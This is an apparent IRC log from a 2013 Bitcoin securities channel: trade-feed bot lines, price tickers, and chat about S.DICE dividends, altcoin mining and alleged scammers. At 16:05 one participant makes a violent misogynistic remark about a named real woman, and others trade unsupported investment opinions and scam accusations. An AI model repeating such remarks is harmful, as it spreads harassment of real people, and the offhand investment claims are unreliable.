@ 0.30688 = 3.0688 BTC [+] Apr 06 05:26:14 [BTCTC] [BTC-BOND] 109 @ 0.01 = 1.09 BTC [+] Apr 06 05:26:55 [HAVELOCK] [VTX] 2 @ 0.44 = 0.88 BTC [+] Apr 06 05:29:05 [BTCTC] [ASICMINER-PT] 23 @ 0.778 = 17.894 BTC [+] Apr 06 05:30:36 [BTCTC] [ASICMINER-PT] 4 @ 0.779 = 3.116 BTC [+] Apr 06 05:31:15 ;;ticker Apr 06 05:31:16 BTCUSD ticker | Best bid: 141.00001, Best ask: 141.89999, Bid-ask spread: 0.89998, Last trade: 141.00001, 24 hour volume: 68994.82037063, 24 hour low: 131.12000, 24 hour high: 144.94000, 24 hour vwap: 139.64835 Apr 06 05:37:05 [BTCTC] [BITVPS] 85 @ 0.0028 = 0.238 BTC [-] Apr 06 05:37:09 [BTCTC] [BITVPS] 300 @ 0.0026 = 0.78 BTC [-] Apr 06 05:37:12 [BTCTC] [BITVPS] 20 @ 0.0021 = 0.042 BTC [-] Apr 06 05:46:20 [BTCTC] [BITVPS] 850 @ 0.002 = 1.7 BTC [-] Apr 06 05:57:00 mr. voorhees has arrived Apr 06 05:57:24 now he announces some news and the s.dice price adjust accordingly Apr 06 05:59:33 alt chains are kinda collapsing Apr 06 06:04:01 [BTCTC] [GSDPT] 15 @ 0.003354 = 0.0503 BTC [-] Apr 06 06:06:31 a well Apr 06 06:12:49 [BTCTC] [BITVPS] 580 @ 0.00191 = 1.1078 BTC [-] Apr 06 06:33:54 THere is a reason they say "the gold standard" and not the "silver" "nickel" "copper" or "tin" standard. Apr 06 06:36:24 you know what a standard is ? Apr 06 06:36:38 a nm, i mistook that for a question Apr 06 06:39:43 [BTCTC] [S.DICE-PT] 1 @ 0.00439 BTC [+] Apr 06 07:02:33 ppcoin is doing pretty well Apr 06 07:02:55 04/06/13 02:14:07 5100.00000000 0.00510000 26.01000000 Apr 06 07:03:05 ^ my last trade Apr 06 07:03:44 is that in usd ? Apr 06 07:03:54 [HAVELOCK] [HIM] 2 @ 1.899 = 3.798 BTC [-] Apr 06 07:04:08 btc Apr 06 07:04:35 wow. Apr 06 07:04:38 5100 ppc @.005 btc Apr 06 07:12:51 I bought my first ones two days ago, Apr 06 07:13:06 "always better to be lucky than smart" i say Apr 06 07:13:12 I mined 40k in the first 12 hours Apr 06 07:13:27 yup seems like these might be the next thing to gain some traction, Apr 06 07:13:35 cost $10 in power oslt Apr 06 07:13:40 BTC-e started trading now like a few hours ago Apr 06 07:14:05 this is why we mine all the chains Apr 06 07:14:12 what did you use to mine them? Apr 06 07:14:31 couple gh of gpu Apr 06 07:14:57 can cgminer do ppcoin /w gpu? Apr 06 07:15:29 yeah its not different to btc Apr 06 07:15:43 [BTCTC] [BTC-BOND] 117 @ 0.01 = 1.17 BTC [+] Apr 06 07:15:54 cool thnx .. I may give that a try, with my .. nVidia Apr 06 07:19:35 so in theory someone could hook up an Avalon and mine the crap outta these ppcoins Apr 06 07:19:48 yes Apr 06 07:20:00 hmm..maybe a bit early to be buying in then Apr 06 07:20:08 though it doesnt work with stratum yet Apr 06 07:20:22 yeah would be a bit dumb not to Apr 06 07:20:25 tbh Apr 06 07:25:41 [MPEX] [O.USD.P200T] 1300 @ 0.62136625 = 807.7761 BTC [-] Apr 06 07:38:20 [MPEX] [O.USD.P200T] 3000 @ 0.62136625 = 1864.0988 BTC [-] Apr 06 07:40:39 [MPEX] [O.USD.P200T] 400 @ 0.62136625 = 248.5465 BTC [-] Apr 06 07:44:14 that's a lot of puts at 200 Apr 06 07:44:58 woohoo Apr 06 07:45:08 i welcome our new overlords Apr 06 07:45:56 someone going short Apr 06 07:46:03 people bitching about not being able to short Apr 06 07:46:10 allex Apr 06 07:46:21 oops Apr 06 07:46:38 my IT department told me not to touch the bitcoins Apr 06 07:47:06 why not Apr 06 07:47:51 you must not be watching the tv news Apr 06 07:47:56 about the bitcoin Apr 06 07:48:07 I don't have a TV Apr 06 07:48:52 on the boat? Apr 06 07:51:14 anywhere Apr 06 07:51:26 well, I lent my TV to a friend several years ago because I never watched it Apr 06 07:51:33 so I technically own one I guess Apr 06 07:52:03 sorry i'm commenting on stupid bitcoin press Apr 06 07:52:25 some guy said something cnbc the other day about his it department wouldn't go near bitcoin Apr 06 07:52:29 "he asked them" Apr 06 07:53:24 why would they need to? Apr 06 07:53:33 I could see compliance departments having a problem with it, in some cases Apr 06 07:53:37 but most companies don't even have that Apr 06 08:01:02 you need to see the videa and see how he says it Apr 06 08:01:06 like a complete moron Apr 06 08:04:11 http://youtu.be/y1POVoi9NPk?t=4m48s Apr 06 08:04:18 the money shot so to speak Apr 06 08:08:00 mircea_popescu: is the registration fee for mpex.co still 30BTC? ...given the recent surge in BTC/USD prices Apr 06 08:17:43 [BTCTC] [S.DICE-PT] 4 @ 0.00439 = 0.0176 BTC [+] Apr 06 08:18:53 [BTCTC] [S.DICE-PT] 4 @ 0.0044 = 0.0176 BTC [+] Apr 06 08:30:21 [BTCTC] [ASICMINER-PT] 1 @ 0.769 BTC [-] Apr 06 08:31:16 [BTCTC] [ASICMINER-PT] 1 @ 0.7686 BTC [-] Apr 06 08:31:19 [BTCTC] [ASICMINER-PT] 4 @ 0.7685 = 3.074 BTC [-] Apr 06 08:39:58 [MPEX] [O.USD.P140T] 5 @ 0.28572235 = 1.4286 BTC [-] Apr 06 08:41:50 lol at all the alt coins trading on btc-e for crazy prices... Apr 06 08:41:57 ppc and trc, nuts Apr 06 08:43:34 [MPEX] [O.USD.P095T] 10 @ 0.06811293 = 0.6811 BTC Apr 06 08:58:57 [BTCTC] [BTC-TRADING-PT] 5 @ 0.1722 = 0.861 BTC [-] Apr 06 08:59:10 [BTCTC] [ASICMINER-PT] 1 @ 0.7789 BTC [+] Apr 06 09:26:50 [MPEX] [S.MPOE] 7733 @ 0.000714 = 5.5214 BTC [+] Apr 06 09:28:55 [HAVELOCK] [SDICE] 10 @ 0.29999 = 2.9999 BTC [-] Apr 06 09:37:26 [BTCTC] [PAJKA.BOND] 2 @ 0.1001 = 0.2002 BTC [-] Apr 06 09:51:15 [BTCTC] [GSDPT] 50 @ 0.003354 = 0.1677 BTC [-] Apr 06 09:58:59 [BTCTC] [ASICMINER-PT] 1 @ 0.7686 BTC [-] Apr 06 09:59:01 [BTCTC] [ASICMINER-PT] 5 @ 0.7685 = 3.8425 BTC [-] Apr 06 10:03:56 is mtgox losing volume already? Apr 06 10:04:27 btce and btc24 having lots of trades in the feed compared to mtgox Apr 06 10:20:54 [HAVELOCK] [SDICE] 1 @ 0.28210001 BTC [-] Apr 06 10:27:53 [HAVELOCK] [SDICE] 1 @ 0.28200001 BTC [-] Apr 06 10:30:14 mp u here? Apr 06 10:31:09 [BTCTC] [PAJKA.BOND] 20 @ 0.095 = 1.9 BTC [-] Apr 06 10:31:41 [BTCTC] [PAJKA.BOND] 6 @ 0.1001 = 0.6006 BTC [+] Apr 06 10:31:44 [BTCTC] [PAJKA.BOND] 2 @ 0.1 = 0.2 BTC [-] Apr 06 10:47:56 that was some nice viet food Apr 06 10:47:58 nomnom Apr 06 10:48:07 damn i love vancouver. diverse food Apr 06 10:56:02 ;;ticker Apr 06 10:56:03 BTCUSD ticker | Best bid: 142.00000, Best ask: 142.24998, Bid-ask spread: 0.24998, Last trade: 142.50000, 24 hour volume: 61098.98505712, 24 hour low: 135.12000, 24 hour high: 144.94000, 24 hour vwap: 140.58777 Apr 06 11:24:54 [HAVELOCK] [SDICE] 1 @ 0.304 BTC [+] Apr 06 11:24:56 [HAVELOCK] [SDICE] 3 @ 0.305 = 0.915 BTC [+] Apr 06 11:26:55 [HAVELOCK] [SDICE] 1 @ 0.305 BTC [+] Apr 06 11:26:56 [HAVELOCK] [SDICE] 3 @ 0.3055 = 0.9165 BTC [+] Apr 06 11:30:54 [HAVELOCK] [SDICE] 1 @ 0.3055 BTC [+] Apr 06 11:36:07 guy comes on irc, asks question, leaves in 4 minutes. Apr 06 11:36:10 noobs today... Apr 06 11:47:43 mircea_popescu have you or your minions investigated at all "Bitcoin Rain" ? Apr 06 11:48:36 https://bitcointalk.org/index.php?topic=168616.0 Apr 06 11:50:41 toffoo superficially. Apr 06 11:50:48 seems like this Leandro guy was like the combined zhoutong + pirateat40 of Brazil, Apr 06 11:50:53 yeah. Apr 06 11:51:01 and apparently getting away with it, Apr 06 11:51:05 yeah. Apr 06 11:51:24 because the Brazilians are like begging for him back Apr 06 11:52:24 the situation probably hasn't gotten the attention it deserves because of the portuguese factor, Apr 06 11:53:17 but smells like he should earn a prominent position on your scam list sometime soon Apr 06 11:54:55 toffoo well, as far as i'm concerned : Apr 06 11:55:02 the brazillians haven't bothered to join #bitcoin-assets. Apr 06 11:55:05 what do i care about them ? Apr 06 11:55:26 certainly will make it on the list volume 2, fwtw. Apr 06 11:57:48 ;;ticker Apr 06 11:57:49 BTCUSD ticker | Best bid: 141.62001, Best ask: 142.00000, Bid-ask spread: 0.37999, Last trade: 142.00000, 24 hour volume: 59239.00956523, 24 hour low: 135.12000, 24 hour high: 144.94000, 24 hour vwap: 140.65500 Apr 06 12:03:04 http://www.reddit.com/r/Bitcoin/comments/1brszi/bitcoin_is_a_concordia_currency/ Apr 06 12:03:47 lmao okay. Apr 06 12:03:49 i'm inclined to call it "discordia currency tho Apr 06 12:03:52 the recipe for a reddit post : Apr 06 12:04:28 Title : {A fear} + {An assumption} = {An inconsistent definition} Apr 06 12:05:00 Body : {Misreference} {Misinterpretation of fact} {Misquote} {Personal Bias} {Daydreaming} {Cat pic} Apr 06 12:06:30 oook. this was just an innocent proposal, tho Apr 06 12:08:00 im in supercharged hate mode. Apr 06 12:08:37 oh, what happened? Apr 06 12:09:34 nothing lol. i just get these. Apr 06 12:10:54 [HAVELOCK] [VTX] 2 @ 0.43 = 0.86 BTC [-] Apr 06 12:11:53 [HAVELOCK] [VTX] 2 @ 0.406 = 0.812 BTC [-] Apr 06 12:14:29 =) Apr 06 12:34:16 Anyone working in the press is a professional and intellectual failure. << yup, this begins well Apr 06 12:34:39 (latest trilema article) Apr 06 12:36:26 :p Apr 06 13:05:41 [BTCTC] [COGNITIVE] 1 @ 0.15789 BTC [+] Apr 06 13:07:38 ;;bc,stats Apr 06 13:07:41 Current Blocks: 229941 | Current Difficulty: 7672999.920164138 | Next Difficulty At Block: 231839 | Next Difficulty In: 1898 blocks | Next Difficulty In About: 1 week, 4 days, 12 hours, 4 minutes, and 21 seconds | Next Difficulty Estimate: 9247456.62683 | Estimated Percent Change: 20.51944 Apr 06 13:13:53 [HAVELOCK] [KCIM] 2 @ 1.179 = 2.358 BTC [-] Apr 06 13:14:16 bitbet could need a help page. there is no explanation how it works, what the numbers mean, what the small graph below each bet means, how to calculate my possible win, etc. Apr 06 13:14:53 [HAVELOCK] [KCIM] 2 @ 1.18 = 2.36 BTC [+] Apr 06 13:16:29 [BTCTC] [GSDPT] 15 @ 0.00329 = 0.0494 BTC [-] Apr 06 13:17:13 [BTCTC] [GSDPT] 3 @ 0.00329 = 0.0099 BTC [-] Apr 06 13:17:18 does anybody here know how it works? Apr 06 13:17:39 or will this remain a secret Apr 06 13:18:49 prof7bit: https://bitcointalk.org/index.php?topic=145819.0 Apr 06 13:20:57 why is the "faq" link white text on white background? No wonder I couldn't find it. Apr 06 13:21:21 in ff it shows fine on black background Apr 06 13:21:40 prolly tell kakobrekla to fix Apr 06 13:21:49 i'm using a webkit based browser Apr 06 13:22:43 ahh ic now. in konqueror+webkit the FAQ gets flushed down, onto white background Apr 06 13:23:40 [BTCTC] [S.MPOE-PT] 1 @ 0.000656 BTC [+] Apr 06 13:30:00 prof7bit it does have a faq neh ? Apr 06 13:30:08 oh Apr 06 13:40:38 this calculation method is very intransparent and convoluted, why not choose a simpler and more intuitive calculation? Apr 06 13:41:52 what is intransparent and convoluted? Apr 06 13:42:17 for me it feels right. just have to remind myself to always check the weight Apr 06 13:42:30 if it's too low, abstain form betting Apr 06 13:43:59 prof7bit because this one happens to be fair. Apr 06 13:44:00 how is the weight calculated, why does this factor even exist, why not just calculate the ratio of total winning side / total losing side? Apr 06 13:44:15 not all bets have weight. Apr 06 13:44:33 but those that do have it to reflect the fact that it's more risk to claim a girl is pregnant in her first week than in her last. Apr 06 13:45:37 weight goes down linearly in time Apr 06 13:46:47 what is the maximum weight and when is it consdered "low", why not ue a percenage instead of 8 digit numbers Apr 06 13:47:46 Current weight: Apr 06 13:47:46 67`186 ( from 100`000 to 1 ) Apr 06 13:47:57 do you specifically feel the need to ask that question ?! Apr 06 13:50:31 Matthew N. Wright Apr 06 13:50:32 Untrustworthy Apr 06 13:50:42 what the fuck Apr 06 13:51:02 failpaste? Apr 06 13:51:11 why no scammer tag? Apr 06 13:51:21 he used to have one Apr 06 13:52:48 support levels are becoming huge Apr 06 13:52:56 above 100 its crazy Apr 06 13:53:21 what's so crazy about it ? Apr 06 13:53:28 ;;bids 0 Apr 06 13:53:30 There are currently 31145510 bitcoins demanded at or over 0.0 USD, worth 12066597.028 USD in total. | Data vintage: 0.0097 seconds Apr 06 13:57:45 ;;bids 100 Apr 06 13:57:47 There are currently 51815.043 bitcoins demanded at or over 100.0 USD, worth 6262852.41742 USD in total. | Data vintage: 0.0059 seconds Apr 06 13:58:47 there is 500K more in bids than yesterday for ;;bids 0 Apr 06 14:38:12 hi all Apr 06 14:38:22 hi ChaangNoi Apr 06 14:38:23 ;;bids 0 Apr 06 14:38:25 There are currently 31144153 bitcoins demanded at or over 0.0 USD, worth 12025871.6491 USD in total. | Data vintage: 0.0100 seconds Apr 06 14:38:47 :D 12 mil Apr 06 14:38:48 seems shockingly quite in here, wanted to makesure it still worked:) Apr 06 14:40:06 12 million bids, thats is nice to see Apr 06 15:07:52 [BTCTC] [CRYPTO-TRADE] 169 @ 0.2 = 33.8 BTC [+] Apr 06 15:10:20 !ticker m s.dice Apr 06 15:10:21 [MPEX:S.DICE] 1D: 0.00286307 / 0.00315869 / 0.00333333 (21469 shares, 67.81 BTC), 7D: 0.00286307 / 0.00324138 / 0.00439992 (545787 shares, 1,769.11 BTC), 30D: 0.00286307 / 0.00365017 / 0.006 (1621037 shares, 5,917.07 BTC) Apr 06 15:11:52 [BTCTC] [S.DICE-PT] 100 @ 0.00447 = 0.447 BTC [+] Apr 06 15:13:36 *hanbot* morning Apr 06 15:22:40 ;;ticker Apr 06 15:22:41 BTCUSD ticker | Best bid: 141.71054, Best ask: 141.90000, Bid-ask spread: 0.18946, Last trade: 141.71052, 24 hour volume: 54153.97471258, 24 hour low: 135.12000, 24 hour high: 144.94000, 24 hour vwap: 141.09054 Apr 06 15:30:07 [BTCTC] [BTC-TRADING-PT] 1 @ 0.17399 BTC [+] Apr 06 15:30:19 [BTCTC] [BTC-TRADING-PT] 5 @ 0.174 = 0.87 BTC [+] Apr 06 15:37:35 [BTCTC] [GSDPT] 7 @ 0.00329 = 0.023 BTC [-] Apr 06 15:40:36 [BTCTC] [B.YABMC] 9 @ 0.01301 = 0.1171 BTC [+] Apr 06 15:40:39 [BTCTC] [B.YABMC] 1 @ 0.013 BTC [-] Apr 06 15:40:42 [BTCTC] [B.YABMC] 10 @ 0.012 = 0.12 BTC [-] Apr 06 15:41:10 [BTCTC] [GSDPT] 1 @ 0.003353 BTC [+] Apr 06 15:54:17 mornin, whats new Apr 06 16:05:25 the rape adria richards contest should be over now Apr 06 16:20:46 ltc dropping like a bitch Apr 06 16:28:02 [BTCTC] [BITVPS] 1 @ 0.00244 BTC [+] Apr 06 16:28:10 [BTCTC] [BITVPS] 1 @ 0.00245 BTC [+] Apr 06 16:28:22 [BTCTC] [BITVPS] 1 @ 0.0025 BTC [+] Apr 06 16:33:44 [MPEX] [S.MPOE] 1300 @ 0.00071399 = 0.9282 BTC [-] Apr 06 16:33:45 [MPEX] [S.MPOE] 8650 @ 0.000714 = 6.1761 BTC [+] Apr 06 16:38:17 Still no love for s.dice, what happened? Apr 06 16:39:26 people who did after-dividend shopping prolly left... Apr 06 16:40:29 $avg Apr 06 16:40:30 ThickAsThieves: 140.67 Apr 06 16:40:54 ;;bids 0 Apr 06 16:40:57 There are currently 31749042 bitcoins demanded at or over 0.0 USD, worth 11902783.3381 USD in total. | Data vintage: 0.0101 seconds Apr 06 16:41:10 ;;asks 149.94 Apr 06 16:41:11 There are currently 10941.045 bitcoins offered at or under 149.94 USD, worth 1604809.16098 USD in total. | Data vintage: 13.5561 seconds Apr 06 16:43:48 [BTCTC] [ASICMINER-PT] 6 @ 0.7685 = 4.611 BTC [-] Apr 06 16:44:09 ;;asks 198 Apr 06 16:44:12 There are currently 29384.845 bitcoins offered at or under 198.0 USD, worth 4757177.58812 USD in total. | Data vintage: 0.0027 seconds Apr 06 16:44:57 ;;bids 98 Apr 06 16:44:57 There are currently 51818.679 bitcoins demanded at or over 98.0 USD, worth 6227000.30109 USD in total. | Data vintage: 45.8592 seconds Apr 06 16:45:26 [MPEX] [S.MPOE] 3000 @ 0.00070759 = 2.1228 BTC [-] Apr 06 16:46:53 [HAVELOCK] [SDICE] 9 @ 0.261 = 2.349 BTC [-] Apr 06 16:47:15 [BTCTC] [GSDPT] 1 @ 0.003353 BTC [+] Apr 06 16:47:53 [HAVELOCK] [SDICE] 1 @ 0.2605 BTC [-] Apr 06 16:49:52 [HAVELOCK] [SDICE] 30 @ 0.2601 = 7.803 BTC [-] Apr 06 16:49:59 [BTCTC] [GSDPT] 30 @ 0.00301 = 0.0903 BTC [-] Apr 06 16:50:02 [BTCTC] [GSDPT] 25 @ 0.003 = 0.075 BTC [-] Apr 06 16:50:05 [BTCTC] [GSDPT] 11 @ 0.00292 = 0.0321 BTC [-] Apr 06 16:50:09 [BTCTC] [GSDPT] 5 @ 0.00291 = 0.0146 BTC [-] Apr 06 16:50:12 [BTCTC] [GSDPT] 11 @ 0.0029 = 0.0319 BTC [-] Apr 06 16:50:52 [HAVELOCK] [SDICE] 20 @ 0.26001 = 5.2002 BTC [-] Apr 06 16:52:52 [HAVELOCK] [SDICE] 2 @ 0.2600001 = 0.52 BTC [-] Apr 06 16:54:52 [HAVELOCK] [SDICE] 9 @ 0.25231 = 2.2708 BTC [-] Apr 06 16:56:41 [BTCTC] [GSDPT] 57 @ 0.00274 = 0.1562 BTC [-] Apr 06 16:56:43 [BTCTC] [GSDPT] 3 @ 0.00273 = 0.0082 BTC [-] Apr 06 16:56:46 [BTCTC] [GSDPT] 2 @ 0.00271 = 0.0054 BTC [-] Apr 06 16:56:48 [BTCTC] [GSDPT] 1 @ 0.00268 BTC [-] Apr 06 16:56:57 sdice dying Apr 06 16:57:35 I am willing to buy S.DICE if anyone wants to well cheap? ;) Apr 06 16:57:47 just buy bbet Apr 06 16:57:50 no one wants dividends? Apr 06 16:58:29 ltc dying too Apr 06 16:58:39 shocking Apr 06 16:58:44 hehe Apr 06 16:58:50 [BTCTC] [ASICMINER-PT] 1 @ 0.765 BTC [-] Apr 06 16:59:07 well nothing is forever so anything that is alive is dying all the time Apr 06 16:59:16 at least in the process of Apr 06 16:59:32 now sell ur btc. Apr 06 16:59:37 speak for yourself Apr 06 16:59:47 i'm only getting stronger Apr 06 16:59:51 mwooo hahahaha Apr 06 17:00:03 its not mwo, its nwo you silly Apr 06 17:00:25 :) Apr 06 17:01:24 ;;seen namworld Apr 06 17:01:24 namworld was last seen in #bitcoin-assets 2 days, 14 hours, 6 minutes, and 55 seconds ago: lag on the rise... and almost no trading... Apr 06 17:05:18 its just going down, it will come back up Apr 06 17:05:34 People do not seem to understand probability and statistics Apr 06 17:05:49 S.DICE are having a really bad month in terms of luck but not that bad month in terms of volume Apr 06 17:06:15 if the volume would be super bad you might be able to justify selling but selling because S.DICE is unlucky and hence had a bad dividend is just a poor decision Apr 06 17:06:22 [BTCTC] [ASICMINER-PT] 1 @ 0.7601 BTC [-] Apr 06 17:09:03 i'll gladly buy at these prices Apr 06 17:09:15 my .0037 offer doesnt look so bad now though DT ;) Apr 06 17:09:21 hehe Apr 06 17:09:52 [HAVELOCK] [SDICE] 30 @ 0.265 = 7.95 BTC [+] Apr 06 17:10:39 eh I am happy to keep the shares ;) Apr 06 17:10:49 I got a nice dividend and I can just wait until S.DICE has good luck again Apr 06 17:11:27 they sold because of elasticity of s.dice price vs BTC Apr 06 17:11:52 [HAVELOCK] [SDICE] 18 @ 0.265 = 4.77 BTC [+] Apr 06 17:12:01 btc perf a hugeeee x11 since jan Apr 06 17:12:30 Ofc Apr 06 17:12:38 but S.DICE is quite resiliant to the BTC price increase Apr 06 17:12:44 the volume has not dropped by 11 times Apr 06 17:12:52 [HAVELOCK] [SDICE] 20 @ 0.265 = 5.3 BTC [+] Apr 06 17:12:59 which suggest that it's still a good investment if you believe in a long term increase in the BTC price Apr 06 17:13:09 beacause ppl play like its 20$ again Apr 06 17:13:22 need time to switch to 140$ Apr 06 17:13:41 plus sdice, AM, and bitbet are like the only decent Btc assets Apr 06 17:13:52 [HAVELOCK] [SDICE] 1 @ 0.265 BTC [+] Apr 06 17:13:58 +1 for AM Apr 06 17:14:09 WTS G.MPOE,G.BBET,BTCQuick, G.ASICMINER-PT, WTB G.SDICE pm me with offers :) Apr 06 17:14:42 It's funny how half a year ago people in this channel lauged at me and called me a scammer for helping AM IPO :) Apr 06 17:14:47 looks like I got the last laugh Apr 06 17:14:52 indeed Apr 06 17:14:53 [HAVELOCK] [SDICE] 5 @ 0.265 = 1.325 BTC [+] Apr 06 17:15:28 time will say, i kept some S.dice 4 glory but if every morning i'm happy with btc rally but i'm cry when i look to S.dice it's not good Apr 06 17:16:14 error4733 in 2 weeks maybe you'll cry you sold it,dunno Apr 06 17:16:15 i miss the AM boat, shame Apr 06 17:16:31 Well, I for one think that S.DICE is a good investment as the volume doesn't follow the BTC price perfectly but it does it well enough to protect okay against a BTC price fall but not good enough to totally crash when the BTC price spikes. Apr 06 17:16:39 [BTCTC] [BITVPS] 1 @ 0.00249 BTC [-] Apr 06 17:16:41 I had 1000 shares, I sold them for 0.126... Apr 06 17:16:45 kind of regret that now Apr 06 17:16:50 Anyway it's not a good practice to check portfolio every day. Apr 06 17:17:14 The only once that profit from active trading (in long term) is your broker/exchange Apr 06 17:17:23 DeaDTerra they still do, and for dealing with AA, usagi etc too Apr 06 17:17:36 agree, but big mistake as a news noob i put 80% of my btc in S.dice Apr 06 17:17:53 [HAVELOCK] [SDICE] 27 @ 0.265 = 7.155 BTC [+] Apr 06 17:17:58 Which still do? Apr 06 17:18:04 think I am a scammer? Apr 06 17:18:05 16:14.50 ( DeaDTerra ) It's funny how half a year ago people in this channel lauged at me and called me a scammer for helping AM IPO :) Apr 06 17:18:09 ah yea Apr 06 17:18:13 well fuck the haters :) Apr 06 17:18:40 If you try to promote things some will turn out bad some will turn out well Apr 06 17:18:52 lol Apr 06 17:18:52 I am not saying I have a perfect record, but I am not a scammer Apr 06 17:19:08 --richard nixon Apr 06 17:19:11 you learn from your mistakes :P Apr 06 17:19:24 i do, dunno if you did Apr 06 17:19:28 ;) Apr 06 17:19:48 I did :) Apr 06 17:20:07 I have learnt that trusting people in the bitcoin forum is naive and doesn't work out Apr 06 17:20:11 So, i succeeded to register at havelock and snatch some sdice...but i don't see function to transfer *to* mpex... Apr 06 17:20:19 It's suspicious. Apr 06 17:20:25 i think thats 10btc a tx Apr 06 17:20:28 you gotta pay topace Apr 06 17:20:52 [HAVELOCK] [HIM] 1 @ 1.9 BTC [+] Apr 06 17:20:58 is it really 10btc? Apr 06 17:21:03 i think jurov just self smarted himlsef Apr 06 17:21:04 that must be an outdated price Apr 06 17:21:07 perhaps Apr 06 17:21:12 was 10 when i last looked at it Apr 06 17:21:19 yep Apr 06 17:21:37 [MPEX] [S.MPOE] 300 @ 0.00070759 = 0.2123 BTC [-] Apr 06 17:21:52 [HAVELOCK] [VTX] 1 @ 0.4375 BTC [+] Apr 06 17:21:55 Okay. So I'll transfer your sdice from havelock to mpex for 0.1btc only. Apr 06 17:22:30 self smart; http://www.youtube.com/watch?v=Pj3SIXtLaAY Apr 06 17:22:39 how would you do that without topace? Apr 06 17:22:41 Ofc, must research if if allows transfer between users. Apr 06 17:23:04 i dont think he has that feature Apr 06 17:23:08 that sounds good jurov, i'll get in touch later probably Apr 06 17:24:52 [HAVELOCK] [SDICE] 5 @ 0.265 = 1.325 BTC [+] Apr 06 17:25:03 Namworld's SDICE is its own lil market Apr 06 17:25:16 That logic... If I know more things my brain will use more oxygen and hence there's a bigger change I will die from a heart attack? Apr 06 17:25:56 perhaps thats why hes doing the show from jail Apr 06 17:26:32 kakobrekla: who? Apr 06 17:26:41 16:22.37 ( kakobrekla ) self smart; http://www.youtube.com/watch?v=Pj3SIXtLaAY Apr 06 17:26:53 [HAVELOCK] [SDICE] 15 @ 0.265 = 3.975 BTC [+] Apr 06 17:27:09 brb Apr 06 17:27:43 [BTCTC] [GSDPT] 30 @ 0.00271 = 0.0813 BTC [+] Apr 06 17:28:53 [HAVELOCK] [SDICE] 3 @ 0.265 = 0.795 BTC [+] Apr 06 17:30:59 [BTCTC] [BITVPS] 1 @ 0.00249 BTC [-] Apr 06 17:33:52 [HAVELOCK] [SDICE] 8 @ 0.253 = 2.024 BTC [-] Apr 06 17:34:40 [BTCTC] [ASICMINER-PT] 1 @ 0.769 BTC [+] Apr 06 17:34:51 [HAVELOCK] [SDICE] 3 @ 0.2523 = 0.7569 BTC [-] Apr 06 17:34:56 [BTCTC] [ASICMINER-PT] 1 @ 0.778 BTC [+] Apr 06 17:37:52 [HAVELOCK] [SDICE] 4 @ 0.253 = 1.012 BTC [+] Apr 06 17:38:32 [MPEX] [S.DICE] 400 @ 0.00276111 = 1.1044 BTC [-] Apr 06 17:50:58 ;;bids 0 Apr 06 17:50:58 There are currently 31748275 bitcoins demanded at or over 0.0 USD, worth 11855944.8587 USD in total. | Data vintage: 76.1617 seconds Apr 06 17:51:02 ;;ticker Apr 06 17:51:03 BTCUSD ticker | Best bid: 142.11000, Best ask: 142.60000, Bid-ask spread: 0.49000, Last trade: 142.98000, 24 hour volume: 50668.79562235, 24 hour low: 136.00000, 24 hour high: 144.94000, 24 hour vwap: 141.56102 Apr 06 17:51:22 ;;bids 135 Apr 06 17:51:22 There are currently 11439.837 bitcoins demanded at or over 135.0 USD, worth 1571682.99787 USD in total. | Data vintage: 99.8146 seconds Apr 06 17:51:35 [BTCTC] [ASICMINER-PT] 3 @ 0.779 = 2.337 BTC [+] Apr 06 17:51:41 ;;asks 148.9 Apr 06 17:51:41 There are currently 7253.3583 bitcoins offered at or under 148.9 USD, worth 1056222.62948 USD in total. | Data vintage: 119.2631 seconds Apr 06 18:01:23 [BTCTC] [BTC-BOND] 1 @ 0.00995 BTC [-] Apr 06 18:27:41 [BTCTC] [PAJKA.BOND] 2 @ 0.1035 = 0.207 BTC [+] Apr 06 18:27:45 [BTCTC] [PAJKA.BOND] 35 @ 0.1039 = 3.6365 BTC [+] Apr 06 18:27:53 [HAVELOCK] [VTX] 1 @ 0.4375 BTC [+] Apr 06 18:27:57 [BTCTC] [PAJKA.BOND] 1 @ 0.104 BTC [+] Apr 06 18:28:08 [BTCTC] [PAJKA.BOND] 11 @ 0.105999 = 1.166 BTC [+] Apr 06 18:28:16 [BTCTC] [PAJKA.BOND] 1 @ 0.105999 BTC [+] Apr 06 18:28:20 [BTCTC] [ASICMINER-PT] 1 @ 0.7788 BTC [-] Apr 06 18:30:25 [MPEX] [O.USD.C119T] 5 @ 0.27839364 = 1.392 BTC [+] Apr 06 18:33:52 [HAVELOCK] [HIM] 1 @ 1.9 BTC [+] Apr 06 18:44:21 [MPEX] [O.USD.C122T] 5 @ 0.28150864 = 1.4075 BTC [+] Apr 06 18:50:13 [BTCTC] [ASICMINER-PT] 1 @ 0.7788 BTC [-] Apr 06 19:16:52 [BTCTC] [ASICMINER-PT] 1 @ 0.779 BTC [+] Apr 06 19:18:03 ;;ticker Apr 06 19:18:04 BTCUSD ticker | Best bid: 143.20300, Best ask: 143.25000, Bid-ask spread: 0.04700, Last trade: 143.25000, 24 hour volume: 47264.29232165, 24 hour low: 138.02000, 24 hour high: 144.94000, 24 hour vwap: 142.02168 Apr 06 19:21:20 ;;goxlag Apr 06 19:21:20 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 06 19:26:59 [MPEX] [S.MPOE] 2150 @ 0.00070759 = 1.5213 BTC [-] Apr 06 19:30:52 [HAVELOCK] [HIM] 1 @ 1.9 BTC [+] Apr 06 19:31:52 [HAVELOCK] [VTX] 2 @ 0.44 = 0.88 BTC [+] Apr 06 19:39:29 [BTCTC] [ASICMINER-PT] 2 @ 0.7799 = 1.5598 BTC [+] Apr 06 19:46:04 [MPEX] [S.DICE] 1000 @ 0.0032 = 3.2 BTC [+] Apr 06 19:46:11 [BTCTC] [S.MPOE-PT] 2 @ 0.000655 = 0.0013 BTC [-] Apr 06 19:48:27 [BTCTC] [S.MPOE-PT] 11 @ 0.000601 = 0.0066 BTC [-] Apr 06 19:50:12 [BTCTC] [S.DICE-PT] 1 @ 0.0037 BTC [-] Apr 06 19:50:40 [MPEX] [S.DICE] 2022 @ 0.003333 = 6.7393 BTC [+] Apr 06 19:50:57 [BTCTC] [GSDPT] 1 @ 0.002755 BTC [+] Apr 06 19:50:59 [BTCTC] [GSDPT] 1 @ 0.0027 BTC [-] Apr 06 19:51:02 [BTCTC] [GSDPT] 5 @ 0.0027 = 0.0135 BTC [-] Apr 06 19:51:10 [BTCTC] [S.DICE-PT] 29 @ 0.0037 = 0.1073 BTC [-] Apr 06 19:51:11 [BTCTC] [S.DICE-PT] 10 @ 0.0037 = 0.037 BTC [-] Apr 06 19:51:14 [BTCTC] [S.DICE-PT] 2 @ 